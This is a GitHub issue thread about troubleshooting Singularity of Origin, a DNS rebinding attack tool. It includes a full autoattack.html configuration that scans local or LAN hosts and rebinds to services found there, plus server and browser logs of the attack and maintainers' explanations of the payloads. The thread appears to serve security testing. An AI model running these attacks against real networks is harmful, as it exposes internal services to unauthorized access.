Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

autoattack.html trying to fetch soopayload.html on target #46

Open
dellarte opened this issue Feb 18, 2022 · 8 comments
Open

autoattack.html trying to fetch soopayload.html on target #46

dellarte opened this issue Feb 18, 2022 · 8 comments

Comments

@dellarte
Copy link

Hi,

I tried to test my simple python app on port 8080 on localhost.
I own a domain and subdomain for this attack.
When I try to load the URL http://rebind.mydomain/autoattack.html, the rebind DNS is working but the simple payload try to fetch my simple python service with GET /soopayload.html which leads to 404...
I set up my config following this video :
https://www.youtube.com/watch?v=R5Y1luRhjbc

<!doctype html>
<html lang="en">
<head>
    <title>Singularity of Origin DNS Rebinding Automatic Attack</title>
    <script src="manager.js"></script>
    <script src=scan-manager.js></script>
    <meta charset="utf-8">
    <meta http-equiv="x-dns-prefetch-control" content="off">
</head>
<body id="body" style="display: none">
    The home page of vulnerable services will be dumped in the browser developer console.
    <script>
        const configuration = {
            attackHostIPAddress: 'X.X.X.X', //my singularity web server 
            attackHostDomain: 'dynamic.mydomain', //which is NS entry 
            rebindingStrategy: 'ma',
            attackPayload: 'Simple Fetch Get',
            interval: "1",
            flushDns: false,
            indexToken: "<!--thisismytesttoken-->",
            wsProxyPort: 3129,
            hideActivity: false,
            delayDOMLoad: false,
        };
        configuration.rebindingSuccessFn = (msg) => {
            console.log(`Iframe reports attack successful for ${msg.origin}\n${msg.data.response}`);
        }
        app.getConfiguration().setManually(configuration);
        let addrSpec = `0.0.0.0`; // this is a Linux Host
        let searchForMoreAddresses = false;
        const portSpec = '8080'; // python simple server port
        function scanFoundNewTargetCb(result) {
            console.log(result);
            document.getElementById("activity").innerHTML += JSON.stringify(result, null, 4) + "<br/>";
            app.attackTarget(result.target.address.replace("-", "--"), result.target.port, true);
        }
        function scanDoneCb(results) {
            document.getElementById("activity").innerHTML += "Done.<br/>";
            setTimeout(function () {
                sm.shutDown();
            }, 3000);
            setTimeout(function () {
                delaydomloadframe.src = "about:blank";
            }, 90000);
        }
        async function getLocalIpAddressesThenScan() {
            sm = ScanManager();
            const externalAddress = await getMyExternalIpAddress();
            addrSpec = `${addrSpec},${externalAddress}`;
            getLocalIpAddress()
                .then(address => {
                    const range = `${address.split('.', 3).join('.')}.1-254`;
                    sm.run(`${addrSpec},${range}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
                },
                    e => {
                        console.log(e);
                        sm.run(`${addrSpec},192.168.1.1-254`, portSpec, scanFoundNewTargetCb, scanDoneCb);
                    })
        }
        if (searchForMoreAddresses === true) {
            getLocalIpAddressesThenScan();
        } else {
            sm = ScanManager();
            sm.run(`${addrSpec}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
        }
    </script>
    <h3>Scanning Progress</h3>
    <div id="activity"></div>
    <h3>DNS Rebinding Progress</h3>
    <div id=attackframes></div>
    <iframe id=delaydomloadframe src="/delaydomload" style="display: none"></iframe>
</body>
</html>

And this is the output of my python server :

127.0.0.1 - - [18/Feb/2022 19:37:59] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:37:59] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:00] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:00] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:01] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:01] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:02] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:02] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:04] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:04] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:05] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:05] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:06] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:06] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
@sanktjodel
Copy link
Collaborator

  • Did you try to perform a manual DNS rebinding attack using the default "First then second" rebinding strategy with the Singularity Manager web interface (/manager.html)?
  • Did you update the attackHostIPAddress and attackHostDomain in the autoattack.html file?
  • What browser and OS are you using?
  • The output from the browser console log would help us showing what is happening.

@tomverrecktecheib
Copy link

@sanktjodel : The same behavior here while testing "Hook and Control". When I replace/set .replace("%7", ''));in the manager.js on line 551, then singularity queries for / instead of soopayload.html, which isn't exisiting.

Currently, "Hook and Control" is not working, because I don't see any session on the soohooked-Backend. Any hints for this?

@sanktjodel
Copy link
Collaborator

@tomverrecktecheib Can you please confirm that a basic DNS rebinding using the default "First then second" rebinding strategy worked? What browser and OS are you using?

@tomverrecktecheib
Copy link

@sanktjodel : Yes basic DNS rebinding using the default "First then second" works, but throws an 404, because it query for /soopayload.html?rnd=0....., and this file isn't existing on the victim side. It's working too with "Multiple answers".

I started an httpd on the victim on 127.0.0.1 and created a simple html-file called soopayload.html, which was then successful queried (and then the correct /index.html was also shown), but I wasn't able to see a websocket-session on the soohooked-proxy.

On the victim:
Linux Firefox 113.0.1 (64Bit)

On the attacker:
Linux Chrome Version 113.0.5672.92 (Official Build) (64-bit)

Thank you.

@sanktjodel
Copy link
Collaborator

It sounds like the DNS rebinding was not successful. Did you try the default "First then second" rebinding strategy with the Simple Fetch Get payload using the Singularity manager interface instead of Hook and Control? It would also help if you could show the browser console output and the server log.

@tomverrecktecheib
Copy link

tomverrecktecheib commented May 17, 2023
edited
Loading

@sanktjodel : I tried with "Simple Fetch Get" and on the victim's-manager.html, I'm able to see the /index.html, AFTER I touched a plain soopayload.html. If I skip the soopayload.html, then I just see a 404 until I modify line 551 in the manager.js (s. above).

Victim's console:

This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13

Server's console:

2023/05/17 08:00:14 Main: Starting DNS Server at 53
2023/05/17 08:00:14 HTTP: starting HTTP Server on :8080
2023/05/17 08:00:14 HTTP: starting HTTP Websockets/Proxy Server on :3129
2023/05/17 08:00:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:52467
2023/05/17 08:00:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:00:43 DNS: session exists: false
2023/05/17 08:00:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:00:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 11.22.33.44
2023/05/17 08:01:03 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:43826
2023/05/17 08:01:03 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:01:03 DNS: session exists: true
2023/05/17 08:01:03 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:01:03 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:01:06 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:46790
2023/05/17 08:01:06 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:01:06 DNS: session exists: true
2023/05/17 08:01:06 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:01:06 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:01:23 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:53870
2023/05/17 08:01:23 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:01:23 DNS: session exists: true
2023/05/17 08:01:23 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:01:23 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:01:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:34152
2023/05/17 08:01:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:01:43 DNS: session exists: true
2023/05/17 08:01:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:01:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:03 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:38702
2023/05/17 08:02:03 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:03 DNS: session exists: true
2023/05/17 08:02:03 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:03 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:04 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:53014
2023/05/17 08:02:04 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:04 DNS: session exists: true
2023/05/17 08:02:04 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:04 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:06 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:59449
2023/05/17 08:02:06 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:06 DNS: session exists: true
2023/05/17 08:02:06 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:06 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:23 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:38764
2023/05/17 08:02:23 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:23 DNS: session exists: true
2023/05/17 08:02:23 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:23 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:41427
2023/05/17 08:02:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:43 DNS: session exists: true
2023/05/17 08:02:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:03 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:50440
2023/05/17 08:03:03 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:03 DNS: session exists: true
2023/05/17 08:03:03 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:03 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:04 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:40154
2023/05/17 08:03:04 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:04 DNS: session exists: true
2023/05/17 08:03:04 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:04 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:23 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:58517
2023/05/17 08:03:23 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:23 DNS: session exists: true
2023/05/17 08:03:23 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:23 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:26 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:58155
2023/05/17 08:03:26 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:26 DNS: session exists: true
2023/05/17 08:03:26 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:26 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:34359
2023/05/17 08:03:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:43 DNS: session exists: true
2023/05/17 08:03:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:03 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:51854
2023/05/17 08:04:03 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:03 DNS: session exists: true
2023/05/17 08:04:03 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:03 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:23 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:55928
2023/05/17 08:04:23 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:23 DNS: session exists: true
2023/05/17 08:04:23 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:23 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:24 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:40233
2023/05/17 08:04:24 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:24 DNS: session exists: true
2023/05/17 08:04:24 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:24 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:37899
2023/05/17 08:04:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:43 DNS: session exists: true
2023/05/17 08:04:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:46 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:39298
2023/05/17 08:04:46 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:46 DNS: session exists: true
2023/05/17 08:04:46 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:46 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1

What is the purpose of soopayload.html and why is this file queried by "Simple Fetch Get" and "Hook and Control" although it doesn't exist on the victim's system? And what could be the reason, that I'm not able to see the session on the websocket-proxy?

Thank you.

@gdncc
Copy link
Collaborator

gdncc commented May 17, 2023

If you see a request for resource "soopayload.html" on the target service, it means that DNS rebinding did not happen successfully in all likelihood. Specifically, using "Simple Fetch Get" with "First then Second" in "autoattack.html" should dump the index page of the target service in the victim's browser. Similarly using "Simple Fetch Get" with "First then Second" in the interactive manager interface should generate an alert box with the contents of the target service index page. If these simple tests do not work, then "Hook and Control" will not succeed. Deploying a "soopayload.html" file with any contents on the target service will not solve the issue.

@tomverrecktecheib
Copy link

Hi @gdncc , @sanktjodel
Problem solved. I had the server running on golang <1.20. Now after upgrading golang to 1.20.4, everything works as designed. Many thanks for your help and sorry for not correct reading the requirements ;-).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@dellarte @gdncc @sanktjodel @tomverrecktecheib